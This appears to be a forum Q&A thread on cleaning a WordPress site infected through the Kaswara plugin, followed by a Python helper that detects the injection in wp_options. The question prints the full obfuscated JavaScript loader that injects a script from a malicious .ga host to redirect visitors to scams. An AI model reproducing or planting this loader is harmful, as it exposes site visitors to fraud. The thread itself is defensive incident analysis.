I have come across the issue that one of the WordPress websites I provide maintenance for would strangely redirect the user (unprotected by an AdBlocker) to scam websites.
The redirection has been done through stick.travelinskydream.ga.
On a closer check, I found that a script with the following code had been automatically injected into the application. This is the code that was used:
var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);
It creates a script tag that executes external JS code which redirects the user to malicious websites when it loads. The resulting script looks like:
<script src="https://stick.travelinskydreams.ga?Brand.js?vid=0000&pidi=191817&id=53646"></script>
From what I've seen, this vulnerability exists within the WpBakery and Kaswara plugins and is a known issue.
https://howtofix.guide/fake-jquery-migrate-plugin/
After deactivating and reactivating plugins one by one, the only two culprits that remained were js_composer (Wp Bakery) and Kaswara. I have tried updating these two plugins, but the "infection" remained, even though patches have been released for this issue.
6 Answers
The resolution was simple enough: after hours, inside Wordpress Dashboard, in the Kaswara menu > custom code sections, the very code that has been presented in the question was there. After deleting it, everything returned to normal.
It is surely not the only way such malware can destroy work, so I am appending this link with other possible effects.
https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/
A potential workaround that worked for me was adding this custom script that would remove the malicious JS after it has loaded (temporary solution, does not remove the virus):
Here is the "beautified" malicious code of the injected JS, maybe it will help someone.
If you find anything else or have been affected by this, please share your solutions!
Just found this option with a Base64-encoded JS script. Find and delete it.
Look for this entry in your WP_OPTIONS table.
What's happening here?
This malware is JavaScript content which triggers the GET of the travelinski brand.js stuff.
Its content is encoded in Base64 to disrupt its detection by SH or a SELECT query. When invoked on the screen it becomes an executable snippet.
It may appear under a different option_name, but the content itself must not change that much.
So anyone looking for this issue, here is the reason and the solution.
Reason
Plugins: the WP-Bakery (JS Composer) and Kaswara plugins have this issue.
Solution
You need to remove one entry from your wp_options table.
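As an added triage helper (not code from the question or from any of the answers), this Python script does two things the thread describes by hand: it decodes the long String.fromCharCode number list from the injected loader to recover the URL it pulls in, and it flags wp_options rows whose value, Base64-encoded or plain, contains such a list or the DOM-insertion strings the loader uses. The sample rows are constructed for the demo; the char codes are the ones quoted in the question.

```python
import base64
import re
# Long comma-separated numeric argument lists, like the obfuscated
# String.fromCharCode(0x68,0x74,...) call in the question's loader.
NUM_LIST_RE = re.compile(
    r"\(\s*((?:0x[0-9a-fA-F]+|\d+)(?:\s*,\s*(?:0x[0-9a-fA-F]+|\d+)){7,})\s*\)")
B64_RE = re.compile(r"^[A-Za-z0-9+/=\s]{40,}$")
INDICATORS = ("createElement", "insertBefore", "appendChild", "fromCharCode", "<script")

def decode_charcode_lists(js: str) -> list:
    """Decode each long numeric list as char codes; keep printable results."""
    out = []
    for m in NUM_LIST_RE.finditer(js):
        toks = re.split(r"\s*,\s*", m.group(1))
        codes = [int(t, 16) if t.lower().startswith("0x") else int(t) for t in toks]
        if all(32 <= c < 127 for c in codes):
            out.append("".join(chr(c) for c in codes))
    return out

def scan_option(option_name: str, option_value: str):
    """Return a finding dict for one wp_options row, or None if it looks clean."""
    decoded = None
    if B64_RE.match(option_value.strip()):  # stored base64-encoded, per the answer above
        try:
            decoded = base64.b64decode(option_value).decode("utf-8", "replace")
        except ValueError:  # not valid base64 after all; treat as plain text
            pass
    text = decoded if decoded is not None else option_value
    hits = [k for k in INDICATORS if k in text]
    urls = [s for s in decode_charcode_lists(text) if "http" in s or ".js" in s]
    if not hits and not urls:
        return None
    return {"option_name": option_name, "base64": decoded is not None,
            "indicators": hits, "decoded_urls": urls}

def scan_rows(rows) -> list:
    return [f for f in (scan_option(n, v) for n, v in rows) if f]

# Constructed sample rows, not a real dump; the char codes are taken from the
# loader quoted in the question and spell out the URL it loads.
PAGE_CHARCODES = ("0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,"
                  "0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,"
                  "0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,"
                  "0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,"
                  "0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37")
INJECTED = "var mm=String.fromCharCode(" + PAGE_CHARCODES + ");"
SAMPLE_ROWS = [("siteurl", "https://example.com"),
               ("kasvaracustomjs", base64.b64encode(INJECTED.encode()).decode()),
               ("theme_cache", base64.b64encode(b"plain serialized settings, nothing odd").decode())]
```

Run it against an export of your wp_options rows (option_name, option_value pairs) and review every finding before deleting anything; a legitimate custom-JS option can trigger the same indicators.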
After you clean your site by removing the extra JS in Kaswara and perform a full scan with Wordfence, then:
For every Wordfence freemium user who tries to fix this issue before 21st May, I suggest:
In wordfence-waf.php, put these lines just one line after the <?php tag:
Then, when you receive the Wordfence update on 21st May, revert back to the original.
Thank you very much for this. I had my website infected with this and restored from backup, only to see it reinfected 2 weeks later. Found the db entry and also saw the script in the custom settings of Kaswara. I'll see how best I can substitute what I used it for and then delete it.
Any idea how they got in? Is there an htaccess directive I can add to block them?
I found this report and went digging and found a p.php file uploaded 8 days ago in the Kaswara icons folder /uploads/kaswara/icon/slt
https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5
After removing the Kaswara plugin, go to MySQL, maybe via phpMyAdmin,
find the wp_options table and delete the kasvaracustomjs option_name.